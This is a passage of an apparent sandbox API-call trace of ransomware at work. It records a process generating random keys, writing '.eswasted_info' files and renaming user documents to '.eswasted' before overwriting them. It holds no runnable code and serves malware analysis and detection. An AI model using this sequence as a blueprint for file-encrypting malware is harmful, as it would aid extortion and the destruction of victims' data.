CloseHandle (hObject=0xfc) returned 1 [0073.035] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0073.035] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0073.036] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0073.036] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0073.036] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\4AaNf2aygyQ.csv") returned 93 [0073.036] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2c4) returned 0x4c7238 [0073.036] lstrcpyW (in: lpString1=0x4c72f2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.036] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0073.036] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0073.037] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0073.037] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0073.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\4AaNf2aygyQ.csv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\4aanf2aygyq.csv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0073.038] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0073.038] SetEndOfFile (hFile=0xfc) returned 1 [0073.039] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.039] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0073.039] lstrcpyW (in: lpString1=0x4c72f2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.039] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\4AaNf2aygyQ.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\4aanf2aygyq.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\4AaNf2aygyQ.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\4aanf2aygyq.csv.eswasted")) returned 1 [0073.041] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\4AaNf2aygyQ.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\4aanf2aygyq.csv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0073.041] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0073.042] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0073.043] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0073.043] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0073.043] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0073.043] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0073.043] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0073.052] SetEndOfFile (hFile=0xfc) returned 1 [0073.054] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0073.054] CloseHandle (hObject=0xfc) returned 1 [0073.055] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c7238 | out: hHeap=0x4a0000) returned 1 [0073.055] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0073.056] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0073.056] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0073.056] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\d1 Nh7ApirO.csv") returned 93 [0073.056] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2c4) returned 0x4c7238 [0073.056] lstrcpyW (in: lpString1=0x4c72f2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.056] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0073.056] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0073.057] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0073.057] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0073.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\d1 Nh7ApirO.csv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\d1 nh7apiro.csv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0073.057] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0073.059] SetEndOfFile (hFile=0xfc) returned 1 [0073.059] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.059] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0073.059] lstrcpyW (in: lpString1=0x4c72f2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.059] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\d1 Nh7ApirO.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\d1 nh7apiro.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\d1 Nh7ApirO.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\d1 nh7apiro.csv.eswasted")) returned 1 [0073.061] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\d1 Nh7ApirO.csv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\d1 nh7apiro.csv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0073.061] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0073.062] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0073.062] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0073.062] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0073.062] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0073.063] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0073.063] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0073.248] SetEndOfFile (hFile=0xfc) returned 1 [0074.238] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0074.238] CloseHandle (hObject=0xfc) returned 1 [0074.239] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4c7238 | out: hHeap=0x4a0000) returned 1 [0074.240] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0074.240] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0074.240] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.240] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\hXbYj-ePunuluS50WV.pptx") returned 101 [0074.240] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2d4) returned 0x4f0960 [0074.241] lstrcpyW (in: lpString1=0x4f0a2a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.241] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0074.241] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0074.241] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0074.241] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\hXbYj-ePunuluS50WV.pptx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\hxbyj-epunulus50wv.pptx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0074.242] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0074.243] SetEndOfFile (hFile=0xfc) returned 1 [0074.243] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.243] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0074.243] lstrcpyW (in: lpString1=0x4f0a2a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\hXbYj-ePunuluS50WV.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\hxbyj-epunulus50wv.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\hXbYj-ePunuluS50WV.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\hxbyj-epunulus50wv.pptx.eswasted")) returned 1 [0074.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\hXbYj-ePunuluS50WV.pptx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\hxbyj-epunulus50wv.pptx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0074.244] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.246] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0074.247] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0074.247] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.247] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0074.248] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0074.248] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.257] SetEndOfFile (hFile=0xfc) returned 1 [0074.259] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0074.259] CloseHandle (hObject=0xfc) returned 1 [0074.260] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0960 | out: hHeap=0x4a0000) returned 1 [0074.260] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0074.261] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0074.261] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.261] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\IMHALTiyYvCYkLuYF.pps") returned 99 [0074.261] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2d0) returned 0x4f0960 [0074.261] lstrcpyW (in: lpString1=0x4f0a26, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.261] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0074.261] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0074.262] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0074.262] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\IMHALTiyYvCYkLuYF.pps.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\imhaltiyyvcykluyf.pps.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0074.853] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0074.854] SetEndOfFile (hFile=0xfc) returned 1 [0074.854] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.854] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0074.854] lstrcpyW (in: lpString1=0x4f0a26, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.854] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\IMHALTiyYvCYkLuYF.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\imhaltiyyvcykluyf.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\IMHALTiyYvCYkLuYF.pps.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\imhaltiyyvcykluyf.pps.eswasted")) returned 1 [0074.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\IMHALTiyYvCYkLuYF.pps.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\imhaltiyyvcykluyf.pps.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.855] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0074.858] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0074.859] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0074.859] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.859] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0074.860] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0074.860] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.868] SetEndOfFile (hFile=0xfc) returned 1 [0074.870] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0074.870] CloseHandle (hObject=0xfc) returned 1 [0074.872] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0960 | out: hHeap=0x4a0000) returned 1 [0074.872] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0074.872] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0074.872] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.872] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\Sg6wZ.xls") returned 87 [0074.872] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b8) returned 0x4e1ab8 [0074.873] lstrcpyW (in: lpString1=0x4e1b66, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.873] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0074.873] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0074.873] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0074.873] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\Sg6wZ.xls.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\sg6wz.xls.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0074.874] WriteFile (in: hFile=0xfc, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0074.875] SetEndOfFile (hFile=0xfc) returned 1 [0074.875] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.875] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0074.875] lstrcpyW (in: lpString1=0x4e1b66, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.875] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\Sg6wZ.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\sg6wz.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\Sg6wZ.xls.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\sg6wz.xls.eswasted")) returned 1 [0074.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\Sg6wZ.xls.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8qeg7y5kasyjms\\nhqqe_fn3tp7luvjdm\\sg6wz.xls.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0074.875] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.877] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0074.878] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f0e90 | out: pbBuffer=0x4f0e90) returned 1 [0074.878] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.878] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0074.879] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0074.879] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.887] SetEndOfFile (hFile=0xfc) returned 1 [0074.889] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0074.889] CloseHandle (hObject=0xfc) returned 1 [0074.890] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0074.890] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0074.891] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0074.891] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0074.891] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\u_J_Tv.odp") returned 88 [0074.891] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ba) returned 0x4e1ab8 [0074.891] lstrcpyW (in: lpString1=0x4e1b68, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") 